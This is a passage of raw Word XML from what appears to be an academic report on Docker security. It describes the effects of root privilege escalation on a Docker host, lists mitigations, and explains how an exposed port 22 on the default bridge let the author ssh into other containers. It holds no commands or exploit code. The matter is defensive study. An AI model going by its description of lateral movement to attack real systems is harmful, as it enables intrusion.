      <w:r w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00AE1279" w:rsidRPr="008F5F41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> After the attack</w:t>
      </w:r>
      <w:r w:rsidR="008F704B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208"/>
      <w:bookmarkEnd w:id="209"/>
    </w:p>
    <w:p w14:paraId="38124459" w14:textId="54E69E71" w:rsidR="00390544" w:rsidRDefault="00B27E5D" w:rsidP="00390544">
      <w:r>
        <w:t xml:space="preserve">The attacker has now </w:t>
      </w:r>
      <w:r w:rsidR="00500B06">
        <w:t xml:space="preserve">gained </w:t>
      </w:r>
      <w:r w:rsidR="00BC7796">
        <w:t xml:space="preserve">full </w:t>
      </w:r>
      <w:r w:rsidR="00500B06">
        <w:t>access to the</w:t>
      </w:r>
      <w:r w:rsidR="00AA6B5F">
        <w:t xml:space="preserve"> host’s</w:t>
      </w:r>
      <w:r w:rsidR="00500B06">
        <w:t xml:space="preserve"> kernel </w:t>
      </w:r>
      <w:r w:rsidR="00491CCF">
        <w:t>with root privilege</w:t>
      </w:r>
      <w:r w:rsidR="00500B06">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00491CCF">
        <w:t xml:space="preserve"> In Linux, </w:t>
      </w:r>
      <w:r w:rsidR="00153DD3">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00491CCF">
        <w:t xml:space="preserve">root user </w:t>
      </w:r>
      <w:r w:rsidR="004B485E">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00A37511">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C45A5F">
        <w:t>a superuser with unlimited privilege, and therefore, the attacker can</w:t>
      </w:r>
      <w:r w:rsidR="005C5781">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00114716">
        <w:t>manipulate the host’s kernel en</w:t>
      </w:r>
      <w:r w:rsidR="00FB0CFD">
        <w:t>dlessly</w:t>
      </w:r>
      <w:r w:rsidR="00415B5B">
        <w:t>, according to</w:t>
      </w:r>
      <w:r w:rsidR="00C02D4C" w:rsidRPr="00C02D4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1123144177"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C02D4C">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C02D4C">
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C02D4C">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51]</w:t>
          </w:r>
          <w:r w:rsidR="00C02D4C">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="002B217F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1130517475"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="002B217F">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="002B217F">
            <w:instrText xml:space="preserve"> CITATION ATo20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="002B217F">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[77]</w:t>
          </w:r>
          <w:r w:rsidR="002B217F">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="0005707D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00787E89">
        <w:t xml:space="preserve"> For instance, the attacker can </w:t>
      </w:r>
      <w:r w:rsidR="00500EA5">
        <w:t xml:space="preserve">identify the </w:t>
      </w:r>
      <w:r w:rsidR="00E24571">
        <w:t xml:space="preserve">applications running </w:t>
      </w:r>
      <w:r w:rsidR="00E04A39">
        <w:t xml:space="preserve">on the host to find </w:t>
      </w:r>
      <w:r w:rsidR="00A7452B">
        <w:t>and exploit vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="0039351D">
        <w:t xml:space="preserve">. Also, the attacker can exploit </w:t>
      </w:r>
      <w:r w:rsidR="00122F3D">
        <w:t>vulnerable containers</w:t>
      </w:r>
      <w:r w:rsidR="00031D89">
        <w:t xml:space="preserve"> inside </w:t>
      </w:r>
      <w:r w:rsidR="00D32F9D">
        <w:t>the Docker environment</w:t>
      </w:r>
      <w:r w:rsidR="00122F3D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00167073">
        <w:t>to run malicious code</w:t>
      </w:r>
      <w:r w:rsidR="00FB6714">
        <w:t>, such as crypto miners</w:t>
      </w:r>
      <w:r w:rsidR="00CF0B4A">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FB6714">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00006CC7">
        <w:t>because the attacker has root access.</w:t>
      </w:r>
      <w:r w:rsidR="00AD207E">
        <w:t xml:space="preserve"> Further, </w:t>
      </w:r>
      <w:r w:rsidR="00CF0B4A">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="007E0DB8">
        <w:t xml:space="preserve">privilege escalation attack on </w:t>
      </w:r>
      <w:r w:rsidR="00CF0B4A">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="007E0DB8">
        <w:t xml:space="preserve">Docker container </w:t>
      </w:r>
      <w:r w:rsidR="000212B2">
        <w:t xml:space="preserve">enables </w:t>
      </w:r>
      <w:r w:rsidR="00800F32">
        <w:t xml:space="preserve">the attacker to alter </w:t>
      </w:r>
      <w:r w:rsidR="00CF0B4A">
        <w:t>confiden</w:t>
      </w:r>
      <w:r w:rsidR="00143635">
        <w:t>tial</w:t>
      </w:r>
      <w:r w:rsidR="000F3BCE">
        <w:t xml:space="preserve"> files, such as “/etc/passwd/”</w:t>
      </w:r>
      <w:r w:rsidR="00CD073F">
        <w:t xml:space="preserve"> illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00BC1574">
        <w:t>29</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1692604573"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00DD7C26">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00DD7C26">
            <w:instrText xml:space="preserve"> CITATION Lin18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00DD7C26">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[54]</w:t>
          </w:r>
          <w:r w:rsidR="00DD7C26">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00891132">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F21944">
        <w:t>In general, the implications of</w:t>
      </w:r>
      <w:r w:rsidR="00201988">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00F21944">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001415C6">
        <w:t>privilege</w:t>
      </w:r>
      <w:r w:rsidR="00201988">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="001415C6">
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
      <w:r w:rsidR="00F21944">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B02040">
        <w:t xml:space="preserve">can be </w:t>
      </w:r>
      <w:r w:rsidR="00415B5B">
        <w:t>harmful,</w:t>
      </w:r>
      <w:r w:rsidR="00B02040">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00AB4909">
        <w:t xml:space="preserve">its attack surface is </w:t>
      </w:r>
      <w:r w:rsidR="00CE4443">
        <w:t>vast</w:t>
      </w:r>
      <w:r w:rsidR="00331278">
        <w:t>, especiall</w:t>
      </w:r>
      <w:r w:rsidR="00E55194">
        <w:t xml:space="preserve">y when the host </w:t>
      </w:r>
      <w:r w:rsidR="004C34AD">
        <w:t xml:space="preserve">running Docker is </w:t>
      </w:r>
      <w:r w:rsidR="009950C9">
        <w:t xml:space="preserve">rented </w:t>
      </w:r>
      <w:r w:rsidR="00C236FA">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00E721ED">
        <w:t xml:space="preserve"> multiple clients </w:t>
      </w:r>
      <w:r w:rsidR="00A71D56">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="00C236FA">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00A71D56">
        <w:t xml:space="preserve"> cloud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA31D78" w14:textId="0EA5CD6E" w:rsidR="00370E4F" w:rsidRDefault="00770729" w:rsidP="00390544">
      <w:r>
        <w:t xml:space="preserve">Configuring a container to run </w:t>
      </w:r>
      <w:r w:rsidR="000858E3">
        <w:t>with an unprivileged user is vital to protect against such attacks</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="762032288"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C33DCE">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C33DCE">
            <w:instrText xml:space="preserve"> CITATION OWA21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C33DCE">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
          <w:r w:rsidR="00C33DCE">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E8778C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DB3250">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="003A3890">
        <w:t>company Docker also strongly recommends</w:t>
      </w:r>
      <w:r w:rsidR="00592DB5">
        <w:t xml:space="preserve"> users</w:t>
      </w:r>
      <w:r w:rsidR="003A3890">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00003283">
        <w:t xml:space="preserve">to run containers </w:t>
      </w:r>
      <w:r w:rsidR="00592DB5">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="004241F5">
        <w:t xml:space="preserve">unprivileged </w:t>
      </w:r>
      <w:r w:rsidR="00B8278D">
        <w:t>mode</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1611280049"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="007B4275">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007B4275">
            <w:instrText xml:space="preserve"> CITATION doc212 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="007B4275">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[35]</w:t>
          </w:r>
          <w:r w:rsidR="007B4275">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00B8278D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00794EC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A41A96">
        <w:t>Additional</w:t>
      </w:r>
      <w:r w:rsidR="00740E2E">
        <w:t xml:space="preserve"> mitigation techniques </w:t>
      </w:r>
      <w:r w:rsidR="00286861">
        <w:t xml:space="preserve">can also </w:t>
      </w:r>
      <w:r w:rsidR="00C208AD">
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidR="00A01D9E">
        <w:t>implemented</w:t>
      </w:r>
      <w:r w:rsidR="00C208AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D75006">
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidR="00C208AD">
        <w:t xml:space="preserve"> the following</w:t>
      </w:r>
      <w:r w:rsidR="00D75006">
        <w:t xml:space="preserve"> lists</w:t>
      </w:r>
      <w:r w:rsidR="00C208AD">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D372E33" w14:textId="408B0D22" w:rsidR="00740E2E" w:rsidRDefault="00063FD5" w:rsidP="00740E2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Specify </w:t>
      </w:r>
      <w:r w:rsidR="00C1561B">
        <w:t>unprivileged user in the Dockerfile</w:t>
      </w:r>
      <w:r w:rsidR="00EF7FCF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1281C568" w14:textId="30A4964A" w:rsidR="0020383F" w:rsidRDefault="00EF7FCF" w:rsidP="002077C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable Linux capabilities features, including </w:t>
      </w:r>
      <w:r w:rsidR="003C624E">
        <w:t xml:space="preserve">AppArmor, </w:t>
      </w:r>
      <w:r w:rsidR="00410C8E">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="003C624E">
        <w:t>eccomp, and S</w:t>
      </w:r>
      <w:r w:rsidR="00410C8E">
        <w:t>EL</w:t>
      </w:r>
      <w:r w:rsidR="003C624E">
        <w:t>inux</w:t>
      </w:r>
      <w:r w:rsidR="00410C8E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744AC292" w14:textId="72E70B32" w:rsidR="002077C3" w:rsidRDefault="00623284" w:rsidP="002077C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r w:rsidR="006F44D3">
        <w:t>Docker daemon in rootless mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D1B227" w14:textId="77777777" w:rsidR="00FE6150" w:rsidRDefault="00FE6150" w:rsidP="00FE6150">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E583282" w14:textId="09F40E78" w:rsidR="00675E14" w:rsidRDefault="00675E14" w:rsidP="002077C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00675E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Container breakout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD9CDFC" w14:textId="56CE732F" w:rsidR="00080C04" w:rsidRDefault="002227F2" w:rsidP="002077C3">
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00776DDC">
        <w:t xml:space="preserve">is attack </w:t>
      </w:r>
      <w:r w:rsidR="0016000C">
        <w:t xml:space="preserve">clearly </w:t>
      </w:r>
      <w:r w:rsidR="00776DDC">
        <w:t>showed</w:t>
      </w:r>
      <w:r w:rsidR="008A15A1">
        <w:t xml:space="preserve"> the security threats </w:t>
      </w:r>
      <w:r w:rsidR="00781367">
        <w:t xml:space="preserve">of exposing ports </w:t>
      </w:r>
      <w:r w:rsidR="00107437">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="009914CA">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00107437">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="007E57CD">
        <w:t>environment.</w:t>
      </w:r>
      <w:r w:rsidR="0094798B">
        <w:t xml:space="preserve"> The attacker was able to exploit the</w:t>
      </w:r>
      <w:r w:rsidR="009F0FFC">
        <w:t xml:space="preserve"> containers because one of </w:t>
      </w:r>
      <w:r w:rsidR="00634370">
        <w:t xml:space="preserve">the Dockerfile exposes port 22 </w:t>
      </w:r>
      <w:r w:rsidR="00D67A01">
        <w:t>to the</w:t>
      </w:r>
      <w:r w:rsidR="0076680C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D67A01">
        <w:t>host via the</w:t>
      </w:r>
      <w:r w:rsidR="0076680C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000836B3">
        <w:t>forwarded port.</w:t>
      </w:r>
      <w:r w:rsidR="00D92515">
        <w:t xml:space="preserve"> As </w:t>
      </w:r>
      <w:r w:rsidR="00910664">
        <w:t>shown in the implementation section, the</w:t>
      </w:r>
      <w:r w:rsidR="000E5DE3">
        <w:t xml:space="preserve"> author was able to ssh onto the non-ssh container without </w:t>
      </w:r>
      <w:r w:rsidR="00EE44F8">
        <w:t xml:space="preserve">any </w:t>
      </w:r>
      <w:r w:rsidR="00B813B9">
        <w:t xml:space="preserve">difficulties, although the container </w:t>
      </w:r>
      <w:r w:rsidR="003F05B9">
        <w:t>is ssh disabled</w:t>
      </w:r>
      <w:r w:rsidR="00255591">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00482190">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00482190">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">as shown in figure </w:t>
      </w:r>
      <w:r w:rsidR="00E954DB">
        <w:t>61</w:t>
      </w:r>
      <w:r w:rsidR="003F05B9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00080C04">
        <w:t xml:space="preserve"> Typically, </w:t>
      </w:r>
      <w:r w:rsidR="00DA6A8E">
        <w:t xml:space="preserve">in a traditional network system, </w:t>
      </w:r>
      <w:r w:rsidR="009F5152">
        <w:t xml:space="preserve">one cannot </w:t>
      </w:r>
      <w:r w:rsidR="00DA6A8E">
        <w:t>ssh into a device</w:t>
      </w:r>
      <w:r w:rsidR="003B7978">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="00700597">
        <w:t xml:space="preserve">is not configured for ssh connections unless </w:t>
      </w:r>
      <w:r w:rsidR="00225B02">
        <w:t>configured.</w:t>
      </w:r>
      <w:r w:rsidR="00DC5FD7">
        <w:t xml:space="preserve"> However, </w:t>
      </w:r>
      <w:r w:rsidR="003379A0">
        <w:t xml:space="preserve">the containers are </w:t>
      </w:r>
      <w:r w:rsidR="002C0B6C">
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidR="00A66F83">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C0B6C">
        <w:t xml:space="preserve">up to use the default </w:t>
      </w:r>
      <w:r w:rsidR="005A6804">
        <w:t>network bridge to</w:t>
      </w:r>
      <w:r w:rsidR="00BC0BC8">
        <w:t xml:space="preserve"> communicate</w:t>
      </w:r>
      <w:r w:rsidR="00E30FFD">
        <w:t xml:space="preserve"> locally</w:t>
      </w:r>
      <w:r w:rsidR="00A53FCA">
        <w:t xml:space="preserve">, and hence, </w:t>
      </w:r>
      <w:r w:rsidR="00FD6F5E">
        <w:t xml:space="preserve">it is possible to access any </w:t>
      </w:r>
      <w:r w:rsidR="00AC44D2">
        <w:t xml:space="preserve">container within the same </w:t>
      </w:r>
      <w:r w:rsidR="005E5E65">
        <w:t>bridge</w:t>
      </w:r>
      <w:r w:rsidR="008B7DC9">
        <w:t xml:space="preserve"> because </w:t>
      </w:r>
      <w:r w:rsidR="00A47C7D">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00117AE6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A47C7D">
        <w:t xml:space="preserve">virtual bridge does not have the </w:t>
      </w:r>
      <w:r w:rsidR="00DF374A">
        <w:t xml:space="preserve">capabilities or features to filter </w:t>
      </w:r>
      <w:r w:rsidR="00117AE6">
        <w:t xml:space="preserve">any incoming </w:t>
      </w:r>
      <w:r w:rsidR="00DF374A">
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidR="00117AE6">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="005E5E65">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008408E9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00423219">
        <w:t>As such, t</w:t>
      </w:r>
      <w:r w:rsidR="008408E9">
        <w:t xml:space="preserve">his vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00FE432C">
        <w:t xml:space="preserve">enabled the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00234BF1">
        <w:t xml:space="preserve">to gain access </w:t>
      </w:r>
      <w:r w:rsidR="00594BD1">
        <w:t xml:space="preserve">through </w:t>
      </w:r>
      <w:r w:rsidR="001F3678">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="001F17C7">
        <w:t xml:space="preserve">exposed port 22 </w:t>
      </w:r>
      <w:r w:rsidR="003F0248">
        <w:t xml:space="preserve">to any other container </w:t>
      </w:r>
      <w:r w:rsidR="00610AA6">
        <w:t xml:space="preserve">connected to the </w:t>
      </w:r>
      <w:r w:rsidR="00B16D01">
        <w:t xml:space="preserve">virtual </w:t>
      </w:r>
      <w:r w:rsidR="00610AA6">
        <w:t>bridge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F54B2F" w14:textId="11FF2F77" w:rsidR="00AE09AC" w:rsidRDefault="00AE09AC" w:rsidP="00AE09AC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71DB6D65" wp14:editId="0A00B6CD">
            <wp:extent cx="5251450" cy="1943100"/>
            <wp:effectExtent l="0" t="0" r="635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51450" cy="1943100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CC9A36" w14:textId="1750805B" w:rsidR="00482190" w:rsidRDefault="00482190" w:rsidP="005C6C3C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="210" w:name="_Toc86858652"/>
      <w:bookmarkStart w:id="211" w:name="_Toc86867542"/>
      <w:r w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>61</w:t>
      </w:r>
      <w:r w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00C93687" w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> A container </w:t>
      </w:r>
      <w:r w:rsidR="005644AB" w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">accessing via ssh to </w:t>
      </w:r>
      <w:r w:rsidR="005C6C3C" w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>non-ssh container.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210"/>
      <w:bookmarkEnd w:id="211"/>
    </w:p>
    <w:p w14:paraId="1E126B5B" w14:textId="4ECC5FF6" w:rsidR="004F6AE3" w:rsidRDefault="00B71794" w:rsidP="004F6AE3">
      <w:r>
        <w:t>In such attacks</w:t>
      </w:r>
      <w:r w:rsidR="004A03EE">
        <w:t xml:space="preserve">, the attacker can expand his/her </w:t>
      </w:r>
      <w:r w:rsidR="00AC67DF">
        <w:t xml:space="preserve">attacks onto </w:t>
      </w:r>
      <w:r w:rsidR="003B3FFF">
        <w:t xml:space="preserve">the host and other containers </w:t>
      </w:r>
      <w:r w:rsidR="00721527">
        <w:t>connected to the same bridge</w:t>
      </w:r>
      <w:r w:rsidR="00863793">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00146AAA">
        <w:t xml:space="preserve"> The attack container can now breakout to other containers</w:t>
      </w:r>
      <w:r w:rsidR="00EE2ED9">
        <w:t xml:space="preserve"> without any challenges</w:t>
